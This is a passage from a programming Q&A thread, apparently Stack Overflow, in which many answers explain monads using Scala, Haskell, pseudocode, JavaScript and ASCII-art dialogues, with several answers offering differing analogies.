// Observe these are identical. Since Option is a Monad
// they will always be identical no matter what the functions are
scala> Some(7).flatMap(f).flatMap(g)
res211: Option[Double] = Some(3.14)
scala> Some(7).flatMap(f(_).flatMap(g))
res212: Option[Double] = Some(3.14)
// As Option is a Monad, there exists an identity:
val id: Int => Option[Int] = x => Some(x)
// Observe these are identical
scala> Some(7).flatMap(id)
res213: Option[Int] = Some(7)
scala> Some(7)
res214: Some[Int] = Some(7)
NOTE Strictly speaking the definition of a Monad in functional programming is not the same as the definition of a Monad in Category Theory, which is defined in terms of map and flatten. Though they are kind of equivalent under certain mappings. This presentation is very good: http://www.slideshare.net/samthemonad/monad-presentation-scala-as-a-category
A: This answer begins with a motivating example, works through the example, derives an example of a monad, and formally defines "monad".
Consider these three functions in pseudocode:
f(<x, messages>) := <x, messages "called f. ">
g(<x, messages>) := <x, messages "called g. ">
wrap(x) := <x, "">
f takes an ordered pair of the form <x, messages> and returns an ordered pair. It leaves the first item untouched and appends "called f. " to the second item. Same with g.
You can compose these functions and get your original value, along with a string that shows which order the functions were called in:
f(g(wrap(x)))
= f(g(<x, "">))
= f(<x, "called g. ">)
= <x, "called g. called f. ">
You dislike the fact that f and g are responsible for appending their own log messages to the previous logging information. (Just imagine for the sake of argument that instead of appending strings, f and g must perform complicated logic on the second item of the pair. It would be a pain to repeat that complicated logic in two -- or more -- different functions.)
You prefer to write simpler functions:
f(x) := <x, "called f. ">
g(x) := <x, "called g. ">
wrap(x) := <x, "">
But look at what happens when you compose them:
f(g(wrap(x)))
= f(g(<x, "">))
= f(<<x, "">, "called g. ">)
= <<<x, "">, "called g. ">, "called f. ">
The problem is that passing a pair into a function does not give you what you want. But what if you could feed a pair into a function:
feed(f, feed(g, wrap(x)))
= feed(f, feed(g, <x, "">))
= feed(f, <x, "called g. ">)
= <x, "called g. called f. ">
Read feed(f, m) as "feed m into f". To feed a pair <x, messages> into a function f is to pass x into f, get <y, message> out of f, and return <y, messages message>.
feed(f, <x, messages>) := let <y, message> = f(x)
in <y, messages message>
Notice what happens when you do three things with your functions:
First: if you wrap a value and then feed the resulting pair into a function:
feed(f, wrap(x))
= feed(f, <x, "">)
= let <y, message> = f(x)
in <y, "" message>
= let <y, message> = <x, "called f. ">
in <y, "" message>
= <x, "" "called f. ">
= <x, "called f. ">
= f(x)
That is the same as passing the value into the function.
Second: if you feed a pair into wrap:
feed(wrap, <x, messages>)
= let <y, message> = wrap(x)
in <y, messages message>
= let <y, message> = <x, "">
in <y, messages message>
= <x, messages "">
= <x, messages>
That does not change the pair.
Third: if you define a function that takes x and feeds g(x) into f:
h(x) := feed(f, g(x))
and feed a pair into it:
feed(h, <x, messages>)
= let <y, message> = h(x)
in <y, messages message>
= let <y, message> = feed(f, g(x))
in <y, messages message>
= let <y, message> = feed(f, <x, "called g. ">)
in <y, messages message>
= let <y, message> = let <z, msg> = f(x)
in <z, "called g. " msg>
in <y, messages message>
= let <y, message> = let <z, msg> = <x, "called f. ">
in <z, "called g. " msg>
in <y, messages message>
= let <y, message> = <x, "called g. " "called f. ">
in <y, messages message>
= <x, messages "called g. " "called f. ">
= feed(f, <x, messages "called g. ">)
= feed(f, feed(g, <x, messages>))
That is the same as feeding the pair into g and feeding the resulting pair into f.
You have most of a monad. Now you just need to know about the data types in your program.
What type of value is <x, "called f. ">? Well, that depends on what type of value x is. If x is of type t, then your pair is a value of type "pair of t and string". Call that type M t.
M is a type constructor: M alone does not refer to a type, but M _ refers to a type once you fill in the blank with a type. An M int is a pair of an int and a string. An M string is a pair of a string and a string. Etc.
Congratulations, you have created a monad!
Formally, your monad is the tuple <M, feed, wrap>.
A monad is a tuple <M, feed, wrap> where:
*
*M is a type constructor.
*feed takes a (function that takes a t and returns an M u) and an M t and returns an M u.
*wrap takes a v and returns an M v.
t, u, and v are any three types that may or may not be the same. A monad satisfies the three properties you proved for your specific monad:
*
*Feeding a wrapped t into a function is the same as passing the unwrapped t into the function.
Formally: feed(f, wrap(x)) = f(x)
*Feeding an M t into wrap does nothing to the M t.
Formally: feed(wrap, m) = m
*Feeding an M t (call it m) into a function that
*
*passes the t into g
*gets an M u (call it n) from g
*feeds n into f
is the same as
*
*feeding m into g
*getting n from g
*feeding n into f
Formally: feed(h, m) = feed(f, feed(g, m)) where h(x) := feed(f, g(x))
Typically, feed is called bind (AKA >>= in Haskell) and wrap is called return.
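For the Haskell-inclined, here is a minimal sketch of this <M, feed, wrap> monad (essentially a Writer monad over strings; the names feed and wrap are kept from the derivation above and are not standard library names):
newtype M a = M (a, String) deriving Show

wrap :: a -> M a
wrap x = M (x, "")

feed :: (a -> M b) -> M a -> M b
feed k (M (x, messages)) = let M (y, message) = k x
                           in  M (y, messages ++ message)

f, g :: Int -> M Int  -- the simple logging functions from the derivation
f x = M (x, "called f. ")
g x = M (x, "called g. ")

-- feed f (feed g (wrap 7)) ==> M (7, "called g. called f. ")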
A: I will try to explain Monad in the context of Haskell.
In functional programming, function composition is important. It allows our program to consist of small, easy-to-read functions.
Let's say we have two functions: g :: Int -> String and f :: String -> Bool.
We can do (f . g) x, which is just the same as f (g x), where x is an Int value.
When doing composition/applying the result of one function to another, having the types match up is important. In the above case, the type of the result returned by g must be the same as the type accepted by f.
But sometimes values are in contexts, and this makes it a bit less easy to line up types. (Having values in contexts is very useful. For example, the Maybe Int type represents an Int value that may not be there, the IO String type represents a String value that is there as a result of performing some side effects.)
Let's say we now have g1 :: Int -> Maybe String and f1 :: String -> Maybe Bool. g1 and f1 are very similar to g and f respectively.
We can't do (f1 . g1) x or f1 (g1 x), where x is an Int value. The type of the result returned by g1 is not what f1 expects.
We could compose f and g with the . operator, but now we can't compose f1 and g1 with .. The problem is that we can't straightforwardly pass a value in a context to a function that expects a value that is not in a context.
Wouldn't it be nice if we introduce an operator to compose g1 and f1, such that we can write (f1 OPERATOR g1) x? g1 returns a value in a context. The value will be taken out of context and applied to f1. And yes, we have such an operator. It's <=<.
We also have the >>= operator that does for us the exact same thing, though in a slightly different syntax.
We write: g1 x >>= f1. g1 x is a Maybe Int value. The >>= operator helps take that Int value out of the "perhaps-not-there" context, and apply it to f1. The result of f1, which is a Maybe Bool, will be the result of the entire >>= operation.
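To make this concrete, a minimal runnable sketch (the bodies of g1 and f1 are made up for illustration):
import Control.Monad ((<=<))

g1 :: Int -> Maybe String
g1 x = if x > 0 then Just (show x) else Nothing

f1 :: String -> Maybe Bool
f1 s = Just (length s > 2)

-- (f1 <=< g1) 500 ==> Just True
-- g1 0 >>= f1     ==> Nothing (f1 is never called)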
And finally, why is Monad useful? Because Monad is the type class that defines the >>= operator, very much the same as the Eq type class that defines the == and /= operators.
To conclude, the Monad type class defines the >>= operator that allows us to pass values in a context (we call these monadic values) to functions that don't expect values in a context. The context will be taken care of.
If there is one thing to remember here, it is that Monads allow function composition that involves values in contexts.
A: A Monad is an Applicative (i.e. something that you can lift binary -- hence, "n-ary" -- functions to,(1) and inject pure values into(2)) Functor (i.e. something that you can map over,(3) i.e. lift unary functions to(3)) with the added ability to flatten the nested datatype (with each of the three notions following its corresponding set of laws). In Haskell, this flattening operation is called join.
The general (generic, parametric) type of this "join" operation is:
join :: Monad m => m (m a) -> m a
for any monad m (NB all ms in the type are the same!).
A specific m monad defines its specific version of join working for any value type a "carried" by the monadic values of type m a. Some specific types are:
join :: [[a]] -> [a] -- for lists, or nondeterministic values
join :: Maybe (Maybe a) -> Maybe a -- for Maybe, or optional values
join :: IO (IO a) -> IO a -- for I/O-produced values
The join operation converts an m-computation producing an m-computation of a-type values into one combined m-computation of a-type values. This allows for combination of computation steps into one larger computation.
This computation steps-combining "bind" (>>=) operator simply uses fmap and join together, i.e.
(ma >>= k) == join (fmap k ma)
{-
ma :: m a -- `m`-computation which produces `a`-type values
k :: a -> m b -- create new `m`-computation from an `a`-type value
fmap k ma :: m ( m b ) -- `m`-computation of `m`-computation of `b`-type values
(ma >>= k) :: m b -- `m`-computation which produces `b`-type values
-}
Conversely, join can be defined via bind: join mma == mma >>= id, where id ma = ma -- whichever is more convenient for a given type m.
For monads, both the do-notation and its equivalent bind-using code,
do { x <- mx ; y <- my ; return (f x y) } -- x :: a , mx :: m a
-- y :: b , my :: m b
mx >>= (\x -> -- nested
my >>= (\y -> -- lambda
return (f x y) )) -- functions
can be read as
first "do" mx, and when it's done, get its "result" as x and let me use it to "do" something else.
In a given do block, each of the values to the right of the binding arrow <- is of type m a for some type a and the same monad m throughout the do block.
return x is a neutral m-computation which just produces the pure value x it is given, such that binding any m-computation with return does not change that computation at all.
(1) with liftA2 :: Applicative m => (a -> b -> c) -> m a -> m b -> m c
(2) with pure :: Applicative m => a -> m a
(3) with fmap :: Functor m => (a -> b) -> m a -> m b
There's also the equivalent Monad methods,
liftM2 :: Monad m => (a -> b -> c) -> m a -> m b -> m c
return :: Monad m => a -> m a
liftM :: Monad m => (a -> b) -> m a -> m b
Given a monad, the other definitions could be made as
pure a = return a
fmap f ma = do { a <- ma ; return (f a) }
liftA2 f ma mb = do { a <- ma ; b <- mb ; return (f a b) }
(ma >>= k) = do { a <- ma ; b <- k a ; return b }
A: After much striving, I think I finally understand the monad. After rereading my own lengthy critique of the overwhelmingly top voted answer, I will offer this explanation.
There are three questions that need to be answered to understand monads:
*
*Why do you need a monad?
*What is a monad?
*How is a monad implemented?
As I noted in my original comments, too many monad explanations get caught up in question 3 before really adequately covering question 2, or question 1.
Why do you need a monad?
Pure functional languages like Haskell are different from imperative languages like C or Java in that a pure functional program is not necessarily executed in a specific order, one step at a time. A Haskell program is more akin to a mathematical function, in which you may solve the "equation" in any number of potential orders. This confers a number of benefits, among which is that it eliminates the possibility of certain kinds of bugs, particularly those relating to things like "state".
However, there are certain problems that are not so straightforward to solve with this style of programming. Some things, like console programming and file I/O, need things to happen in a particular order, or need to maintain state. One way to deal with this problem is to create a kind of object that represents the state of a computation, and a series of functions that take a state object as input and return a new, modified state object.
So let's create a hypothetical "state" value that represents the state of a console screen. Exactly how this value is constructed is not important, but let's say, in pseudocode, it's an array of ASCII characters representing what is currently visible on the screen, plus an array representing the last line of input entered by the user. We've defined some functions that take a console state, modify it, and return a new console state.
consolestate MyConsole = new consolestate;
So to do console programming, but in a pure functional manner, you would need to nest a lot of function calls inside each other.
consolestate FinalConsole = print(input(print(myconsole, "Hello, what's your name?")),"hello, %inputbuffer%!");
Programming in this way keeps the "pure" functional style, while forcing changes to the console to happen in a particular order. But, we'll probably want to do more than just a few operations at a time like in the above example. Nesting functions in that way will start to become ungainly. What we want, is code that does essentially the same thing as above, but is written a bit more like this:
consolestate FinalConsole = myconsole:
print("Hello, what's your name?"):
input():
print("hello, %inputbuffer%!");
This would indeed be a more convenient way to write it. How do we do that though?
What is a monad?
Once you have a type (such as consolestate) that you define along with a bunch of functions designed specifically to operate on that type, you can turn the whole package of these things into a "monad" by defining an operator like : (bind) that automatically feeds return values on its left into function parameters on its right, and a lift operator that turns normal functions into functions that work with that specific kind of bind operator.
How is a monad implemented?
See other answers, that seem quite free to jump into the details of that.
A: After giving an answer to this question a few years ago, I believe I can improve and simplify that response with...
A monad is a function composition technique that externalizes treatment for some input scenarios using a composing function, bind, to pre-process input during composition.
In normal composition, the function compose (>>) is used to apply the composed function to the result of its predecessor in sequence. Importantly, the function being composed is required to handle all scenarios of its input.
(x -> y) >> (y -> z)
This design can be improved by restructuring the input so that relevant states are more easily interrogated. So, instead of simply y, the value can become Mb, such as, for instance, (is_OK, b) if y included a notion of validity.
For example, when the input is only possibly a number, instead of returning a string which can dutifully contain a number or not, you could restructure the type into a bool indicating the presence of a valid number and a number in a tuple, such as bool * float. The composed functions would now no longer need to parse an input string to determine whether a number exists but could merely inspect the bool portion of the tuple.
(Ma -> Mb) >> (Mb -> Mc)
Here, again, composition occurs naturally with compose and so each function must handle all scenarios of its input individually, though doing so is now much easier.
However, what if we could externalize the effort of interrogation for those times where handling a scenario is routine. For example, what if our program does nothing when the input is not OK as in when is_OK is false. If that were done then composed functions would not need to handle that scenario themselves, dramatically simplifying their code and effecting another level of reuse.
To achieve this externalization we could use a function, bind (>>=), to perform the composition instead of compose. As such, instead of simply transferring values from the output of one function to the input of another, bind would inspect the M portion of Ma and decide whether and how to apply the composed function to the a. Of course, the function bind would be defined specifically for our particular M so as to be able to inspect its structure and perform whatever type of application we want. Nonetheless, the a can be anything since bind merely passes the a uninspected to the composed function when it determines application necessary. Additionally, the composed functions themselves no longer need to deal with the M portion of the input structure either, simplifying them. Hence...
(a -> Mb) >>= (b -> Mc) or more succinctly Mb >>= (b -> Mc)
In short, a monad externalizes and thereby provides standard behaviour around the treatment of certain input scenarios once the input becomes designed to sufficiently expose them. This design is a shell and content model where the shell contains data relevant to the application of the composed function and is interrogated by and remains only available to the bind function.
Therefore, a monad is three things:
*
*an M shell for holding monad relevant information,
*a bind function implemented to make use of this shell information in its application of the composed functions to the content value(s) it finds within the shell, and
*composable functions of the form, a -> Mb, producing results that include monadic management data.
Generally speaking, the input to a function is far more restrictive than its output which may include such things as error conditions; hence, the Mb result structure is generally very useful. For instance, the division operator does not return a number when the divisor is 0.
Additionally, monads may include wrap functions that wrap values, a, into the monadic type, Ma, and general functions, a -> b, into monadic functions, a -> Mb, by wrapping their results after application. Of course, like bind, such wrap functions are specific to M. An example:
let return a = [a]
let lift f a = return (f a)
The design of the bind function presumes immutable data structures and pure functions; otherwise things get complex and guarantees cannot be made. As such, there are monadic laws:
Given...
M_
return = (a -> Ma)
f = (a -> Mb)
g = (b -> Mc)
Then...
Left Identity : (return a) >>= f === f a
Right Identity : Ma >>= return === Ma
Associative : (Ma >>= f) >>= g === Ma >>= (fun x -> f x >>= g)
Associativity means that bind preserves the order of evaluation regardless of when bind is applied. That is, in the definition of Associativity above, forcing early evaluation of the parenthesized binding of f and g will only result in a function that expects Ma in order to complete the bind. Hence the evaluation of Ma must be determined before its value can become applied to f, and that result in turn applied to g.
A: If I've understood correctly, IEnumerable is derived from monads. I wonder if that might be an interesting angle of approach for those of us from the C# world?
For what it's worth, here are some links to tutorials that helped me (and no, I still haven't understood what monads are).
*
*http://osteele.com/archives/2007/12/overloading-semicolon
*http://spbhug.folding-maps.org/wiki/MonadsEn
*http://www.loria.fr/~kow/monads/
A: http://code.google.com/p/monad-tutorial/ is a work in progress to address exactly this question.
A: What the world needs is another monad blog post, but I think this is useful in identifying existing monads in the wild.
monads are fractals
[figure: the Sierpinski triangle]
The above is a fractal called the Sierpinski triangle, the only fractal I can remember to draw. Fractals are self-similar structures like the above triangle, in which the parts are similar to the whole (in this case exactly half the scale of the parent triangle).
Monads are fractals. Given a monadic data structure, its values can be composed to form another value of the data structure. This is why it's useful to programming, and this is why it occurs in many situations.
A: A monad is a container, but for data. A special container.
All containers can have openings and handles and spouts, but these containers are all guaranteed to have certain openings and handles and spouts.
Why? Because these guaranteed openings and handles and spouts are useful for picking up and linking together the containers in specific, common ways.
This allows you to pick up different containers without having to know much about them. It also allows different kinds of containers to link together easily.
A: A monad is, effectively, a form of "type operator". It will do three things. First it will "wrap" (or otherwise convert) a value of one type into another type (typically called a "monadic type"). Secondly it will make all the operations (or functions) available on the underlying type available on the monadic type. Finally it will provide support for combining its self with another monad to produce a composite monad.
The "maybe monad" is essentially the equivalent of "nullable types" in Visual Basic / C#. It takes a non nullable type "T" and converts it into a "Nullable<T>", and then defines what all the binary operators mean on a Nullable<T>.
Side effects are represented similarly. A structure is created that holds descriptions of side effects alongside a function's return value. The "lifted" operations then copy around side effects as values are passed between functions.
They are called "monads" rather than the easier-to-grasp name of "type operators" for several reasons:
*
*Monads have restrictions on what they can do (see the definition for details).
*Those restrictions, along with the fact that there are three operations involved, conform to the structure of something called a monad in Category Theory, which is an obscure branch of mathematics.
*They were designed by proponents of "pure" functional languages
*Proponents of pure functional languages like obscure branches of mathematics
*Because the math is obscure, and monads are associated with particular styles of programming, people tend to use the word monad as a sort of secret handshake. Because of this no one has bothered to invest in a better name.
A: (See also the answers at What is a monad?)
A good motivation to Monads is sigfpe (Dan Piponi)'s You Could Have Invented Monads! (And Maybe You Already Have). There are a LOT of other monad tutorials, many of which misguidedly try to explain monads in "simple terms" using various analogies: this is the monad tutorial fallacy; avoid them.
As DR MacIver says in Tell us why your language sucks:
So, things I hate about Haskell:
Let’s start with the obvious. Monad tutorials. No, not monads. Specifically the tutorials. They’re endless, overblown and dear god are they tedious. Further, I’ve never seen any convincing evidence that they actually help. Read the class definition, write some code, get over the scary name.
You say you understand the Maybe monad? Good, you're on your way. Just start using other monads and sooner or later you'll understand what monads are in general.
[If you are mathematically oriented, you might want to ignore the dozens of tutorials and learn the definition, or follow lectures in category theory :)
The main part of the definition is that a Monad M involves a "type constructor" that defines for each existing type "T" a new type "M T", and some ways for going back and forth between "regular" types and "M" types.]
Also, surprisingly enough, one of the best introductions to monads is actually one of the early academic papers introducing monads, Philip Wadler's Monads for functional programming. It actually has practical, non-trivial motivating examples, unlike many of the artificial tutorials out there.
A: A very simple answer is:
Monads are an abstraction that provide an interface for encapsulating values, for computing new encapsulated values, and for unwrapping the encapsulated value.
What's convenient about them in practice is that they provide a uniform interface for creating data types that model state while not being stateful.
It's important to understand that a Monad is an abstraction, that is, an abstract interface for dealing with a certain kind of data structure. That interface is then used to build data types that have monadic behavior.
You can find a very good and practical introduction in Monads in Ruby, Part 1: Introduction.
A: Let the below "{| a |m}" represent some piece of monadic data. A data type which advertises an a:
(I got an a!)
/
{| a |m}
Function, f, knows how to create a monad, if only it had an a:
(Hi f! What should I be?)
/
(You?. Oh, you'll be /
that data there.) /
/ / (I got a b.)
| -------------- |
| / |
f a |
|--later-> {| b |m}
Here we see function, f, tries to evaluate a monad but gets rebuked.
(Hmm, how do I get that a?)
o (Get lost buddy.
o Wrong type.)
o /
f {| a |m}
Function, f, finds a way to extract the a by using >>=.
(Muaahaha. How you
like me now!?)
(Better.) \
| (Give me that a.)
(Fine, well ok.) |
\ |
{| a |m} >>= f
Little does f know, the monad and >>= are in collusion.
(Yah got an a for me?)
(Yeah, but hey |
listen. I got |
something to |
tell you first |
...) \ /
| /
{| a |m} >>= f
But what do they actually talk about? Well, that depends on the monad. Talking solely in the abstract has limited use; you have to have some experience with particular monads to flesh out the understanding.
For instance, the data type Maybe
data Maybe a = Nothing | Just a
has a monad instance which will acts like the following...
Wherein, if the case is Just a
(Yah what is it?)
(... hm? Oh, |
forget about it. |
Hey a, yr up.) |
\ |
(Evaluation \ |
time already? \ |
Hows my hair?) | |
| / |
| (It's |
| fine.) /
| / /
{| a |m} >>= f
But for the case of Nothing
(Yah what is it?)
(... There |
is no a. ) |
| (No a?)
(No a.) |
| (Ok, I'll deal
| with this.)
\ |
\ (Hey f, get lost.)
\ | ( Where's my a?
\ | I evaluate a)
\ (Not any more |
\ you don't. |
| We're returning
| Nothing.) /
| | /
| | /
| | /
{| a |m} >>= f (I got a b.)
| (This is \
| such a \
| sham.) o o \
| o|
|--later-> {| b |m}
So the Maybe monad lets a computation continue if it actually contains the a it advertises, but aborts the computation if it doesn't. The result, however, is still a piece of monadic data, though not the output of f. For this reason, the Maybe monad is used to represent the context of failure.
Different monads behave differently. Lists are other types of data with monadic instances. They behave like the following:
(Ok, here's your a. Well, its
a bunch of them, actually.)
|
| (Thanks, no problem. Ok
| f, here you go, an a.)
| |
| | (Thank's. See
| | you later.)
| (Whoa. Hold up f, |
| I got another |
| a for you.) |
| | (What? No, sorry.
| | Can't do it. I
| | have my hands full
| | with all these "b"
| | I just made.)
| (I'll hold those, |
| you take this, and /
| come back for more /
| when you're done /
| and we'll do it /
| again.) /
\ | ( Uhhh. All right.)
\ | /
\ \ /
{| a |m} >>= f
In this case, the function knew how to make a list from its input, but didn't know what to do with extra input and extra lists. The bind, >>=, helped f out by combining the multiple outputs. I include this example to show that while >>= is responsible for extracting a, it also has access to the eventual bound output of f. Indeed, it will never extract any a unless it knows the eventual output has the same type of context.
There are other monads which are used to represent different contexts. Here's some characterizations of a few more. The IO monad doesn't actually have an a, but it knows a guy and will get that a for you. The State st monad has a secret stash of st that it will pass to f under the table, even though f just came asking for an a. The Reader r monad is similar to State st, although it only lets f look at r.
The point in all this is that any type of data which declares itself to be a Monad is declaring some sort of context around extracting a value from the monad. The big gain from all this? Well, it's easy enough to couch a calculation with some sort of context. It can get messy, however, when stringing together multiple context-laden calculations. The monad operations take care of resolving the interactions of context so that the programmer doesn't have to.
Note that use of >>= eases the mess by taking some of the autonomy away from f. That is, in the above case of Nothing for instance, f no longer gets to decide what to do in the case of Nothing; it's encoded in >>=. This is the trade-off. If it was necessary for f to decide what to do in the case of Nothing, then f should have been a function from Maybe a to Maybe b. In this case, Maybe being a monad is irrelevant.
Note, however, that sometimes a data type does not export its constructors (looking at you, IO), and if we want to work with the advertised value we have little choice but to work with its monadic interface.
A: Monads are to control flow what abstract data types are to data.
In other words, many developers are comfortable with the idea of Sets, Lists, Dictionaries (or Hashes, or Maps), and Trees. Within those data types there are many special cases (for instance InsertionOrderPreservingIdentityHashMap).
However, when confronted with program "flow" many developers haven't been exposed to many more constructs than if, switch/case, do, while, goto (grr), and (maybe) closures.
So, a monad is simply a control flow construct. A better phrase to replace monad would be 'control type'.
As such, a monad has slots for control logic, or statements, or functions - the equivalent in data structures would be to say that some data structures allow you to add data, and remove it.
For example, the "if" monad:
if( clause ) then block
at its simplest has two slots - a clause, and a block. The if monad is usually built to evaluate the result of the clause, and if not false, evaluate the block. Many developers are not introduced to monads when they learn 'if', and it just isn't necessary to understand monads to write effective logic.
Monads can become more complicated, in the same way that data structures can become more complicated, but there are many broad categories of monad that may have similar semantics, but differing implementations and syntax.
Of course, in the same way that data structures may be iterated over, or traversed, monads may be evaluated.
Compilers may or may not have support for user-defined monads. Haskell certainly does. Ioke has some similar capabilities, although the term monad is not used in the language.
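For instance, in Haskell the "if as a control type" idea above can be written as an ordinary function over monadic actions. A minimal sketch (whenSketch mirrors the library function when from Control.Monad):
-- Run the block only when the clause holds; otherwise do nothing.
whenSketch :: Monad m => Bool -> m () -> m ()
whenSketch clause block = if clause then block else return ()

main :: IO ()
main = do
  whenSketch True  (putStrLn "clause held, so the block ran")
  whenSketch False (putStrLn "never printed")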
A: Actually, contrary to common understanding of Monads, they have nothing to do with state. Monads are simply a way to wrapping things and provide methods to do operations on the wrapped stuff without unwrapping it.
For example, you can create a type to wrap another one, in Haskell:
data Wrapped a = Wrap a
To wrap stuff we define
return :: a -> Wrapped a
return x = Wrap x
To perform operations without unwrapping, say you have a function f :: a -> b, then you can do this to lift that function to act on wrapped values:
fmap :: (a -> b) -> (Wrapped a -> Wrapped b)
fmap f (Wrap x) = Wrap (f x)
That's about all there is to understand. However, it turns out that there is a more general function to do this lifting, which is bind:
bind :: (a -> Wrapped b) -> (Wrapped a -> Wrapped b)
bind f (Wrap x) = f x
bind can do a bit more than fmap, but not vice versa. Actually, fmap can be defined only in terms of bind and return. So, when defining a monad, you give its type (here it was Wrapped a) and then say how its return and bind operations work.
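A minimal sketch of that claim, reusing the Wrapped, bind and return definitions above (in a real module you would hide the Prelude's clashing names):
-- fmap recovered from bind and return:
fmap' :: (a -> b) -> (Wrapped a -> Wrapped b)
fmap' f = bind (\x -> return (f x))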
The cool thing is that this turns out to be such a general pattern that it pops up all over the place, encapsulating state in a pure way is only one of them.
For a good article on how monads can be used to introduce functional dependencies and thus control order of evaluation, like it is used in Haskell's IO monad, check out IO Inside.
As for understanding monads, don't worry too much about it. Read whatever you find interesting about them and don't worry if you don't understand right away. Then just diving into a language like Haskell is the way to go. Monads are one of these things where understanding trickles into your brain by practice, one day you just suddenly realize you understand them.
A: A monad is a thing used to encapsulate objects that have changing state. It is most often encountered in languages that otherwise do not allow you to have modifiable state (e.g., Haskell).
An example would be for file I/O.
You would be able to use a monad for file I/O to isolate the changing state nature to just the code that used the Monad. The code inside the Monad can effectively ignore the changing state of the world outside the Monad - this makes it a lot easier to reason about the overall effect of your program.
A: Princess's explanation of F# Computation Expressions helped me, though I still can't say I've really understood.
EDIT: this series - explaining monads with javascript - is the one that 'tipped the balance' for me.
*
*http://blog.jcoglan.com/2011/03/05/translation-from-haskell-to-javascript-of-selected-portions-of-the-best-introduction-to-monads-ive-ever-read/
*http://blog.jcoglan.com/2011/03/06/monad-syntax-for-javascript/
*http://blog.jcoglan.com/2011/03/11/promises-are-the-monad-of-asynchronous-programming/
I think that understanding monads is something that creeps up on you. In that sense, reading as many 'tutorials' as you can is a good idea, but often strange stuff (unfamiliar language or syntax) prevents your brain from concentrating on the essential.
Some things that I had difficulty understanding:
*
*Rules-based explanations never worked for me, because most practical examples actually require more than just return/bind.
*Also, calling them rules didn't help. It is more a case of "there are these things that have something in common, let's call the things 'monads', and the bits in common 'rules'".
*Return (a -> M<a>) and Bind (M<a> -> (a -> M<b>) -> M<b>) are great, but what I could never understand is HOW Bind could extract the a from M<a> in order to pass it into a -> M<b>. I don't think I've ever read anywhere (maybe it's obvious to everyone else) that the reverse of Return (M<a> -> a) has to exist inside the monad; it just doesn't need to be exposed. The sketch below shows this for Maybe.
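A minimal Haskell sketch of that last point - Maybe's bind reaches the wrapped a by pattern matching on the monad's own constructors, which is possible inside the instance but never exported as a standalone M<a> -> a function:
-- A sketch mirroring the Prelude's definition for Maybe:
bindMaybe :: Maybe a -> (a -> Maybe b) -> Maybe b
bindMaybe Nothing  _ = Nothing
bindMaybe (Just x) f = f x   -- the match on Just is the hidden "reverse of Return"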
A: Explaining monads seems to be like explaining control-flow statements. Imagine that a non-programmer asks you to explain them?
You can give them an explanation involving the theory - Boolean Logic, register values, pointers, stacks, and frames. But that would be crazy.
You could explain them in terms of the syntax. Basically all control-flow statements in C have curly brackets, and you can distinguish the condition and the conditional code by where they are relative to the brackets. That may be even crazier.
Or you could also explain loops, if statements, routines, subroutines, and possibly co-routines.
Monads can replace a fairly large number of programming techniques. There's a specific syntax in languages that support them, and some theories about them.
They are also a way for functional programmers to use imperative code without actually admitting it, but that's not their only use.
A: I'm trying to understand monads as well. It's my version:
Monads are about making abstractions about repetitive things.
Firstly, a monad itself is a typed interface (like an abstract generic class) that has two functions, bind and return, with defined signatures. Then we can create concrete monads based on that abstract monad, each with specific implementations of bind and return. Additionally, bind and return must fulfill a few invariants in order to make it possible to compose/chain concrete monads.
Why create the monad concept while we have interfaces, types, classes and other tools to create abstractions? Because monads give more: they enforce rethinking problems in a way that enables composing data without any boilerplate.
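The invariants mentioned above are the three monad laws. A minimal Haskell sketch, checking associativity for Maybe (f and g are illustrative):
-- return a >>= f   ==  f a                      (left identity)
-- m >>= return     ==  m                        (right identity)
-- (m >>= f) >>= g  ==  m >>= (\x -> f x >>= g)  (associativity)
assocHolds :: Bool
assocHolds = ((Just 2 >>= f) >>= g) == (Just 2 >>= \x -> f x >>= g)
  where f n = Just (n + 1)
        g n = Just (n * 2)   -- both sides evaluate to Just 6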
A: Essentially, and Practically, monads allow callback nesting
(with a mutually-recursively-threaded state (pardon the hyphens))
(in a composable (or decomposable) fashion)
(with type safety (sometimes (depending on the language)))
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
E.G. this is NOT a monad:
//JavaScript is 'Practical'
var getAllThree =
bind(getFirst, function(first){
return bind(getSecond,function(second){
return bind(getThird, function(third){
var fancyResult = // And now make do fancy
// with first, second,
// and third
return RETURN(fancyResult);
});});});
But monads enable such code.
The monad is actually the set of types for:
{bind,RETURN,maybe others I don't know...}.
Which is essentially inessential, and practically impractical.
So now I can use it:
var fancyResultReferenceOutsideOfMonad =
getAllThree(someKindOfInputAcceptableToOurGetFunctionsButProbablyAString);
//Ignore this please, throwing away types, yay JavaScript:
// RETURN = K
// bind = \getterFn,cb ->
// \in -> let(result,newState) = getterFn(in) in cb(result)(newState)
Or Break it up:
var getFirstTwo =
bind(getFirst, function(first){
return bind(getSecond,function(second){
var fancyResult2 = // And now make do fancy
// with first and second
return RETURN(fancyResult2);
});})
, getAllThree =
bind(getFirstTwo, function(fancyResult2){
return bind(getThird, function(third){
var fancyResult3 = // And now make do fancy
// with fancyResult2,
// and third
return RETURN(fancyResult3);
});});
Or ignore certain results:
var getFirstTwo =
bind(getFirst, function(first){
return bind(getSecond,function(second){
var fancyResult2 = // And now make do fancy
// with first and second
return RETURN(fancyResult2);
});})
, getAllThree =
bind(getFirstTwo, function(____dontCare____NotGonnaUse____){
return bind(getThird, function(three){
var fancyResult3 = // And now make do fancy
// with `three` only!
return RETURN(fancyResult3);
});});
Or simplify a trivial case from:
var getFirstTwo =
bind(getFirst, function(first){
return bind(getSecond,function(second){
var fancyResult2 = // And now make do fancy
// with first and second
return RETURN(fancyResult2);
});})
, getAllThree =
bind(getFirstTwo, function(_){
return bind(getThird, function(three){
return RETURN(three);
});});
To (using "Right Identity"):
var getFirstTwo =
bind(getFirst, function(first){
return bind(getSecond,function(second){
var fancyResult2 = // And now make do fancy
// with first and second
return RETURN(fancyResult2);
});})
, getAllThree =
bind(getFirstTwo, function(_){
return getThird;
});
Or jam them back together:
var getAllThree =
bind(getFirst, function(first_dontCareNow){
return bind(getSecond,function(second_dontCareNow){
return getThird;
});});
The practicality of these abilities doesn't really emerge,
or become clear until you try to solve really messy problems
like parsing, or module/ajax/resource loading.
Can you imagine thousands of lines of indexOf/subString logic?
What if frequent parsing steps were contained in little functions?
Functions like chars, spaces,upperChars, or digits?
And what if those functions gave you the result in a callback,
without having to mess with Regex groups, and arguments.slice?
And what if their composition/decomposition was well understood?
Such that you could build big parsers from the bottom up?
So the ability to manage nested callback scopes is incredibly practical,
especially when working with monadic parser combinator libraries.
(that is to say, in my experience)
DON'T GET HUNG UP ON:
- CATEGORY-THEORY
- MAYBE-MONADS
- MONAD LAWS
- HASKELL
- !!!!
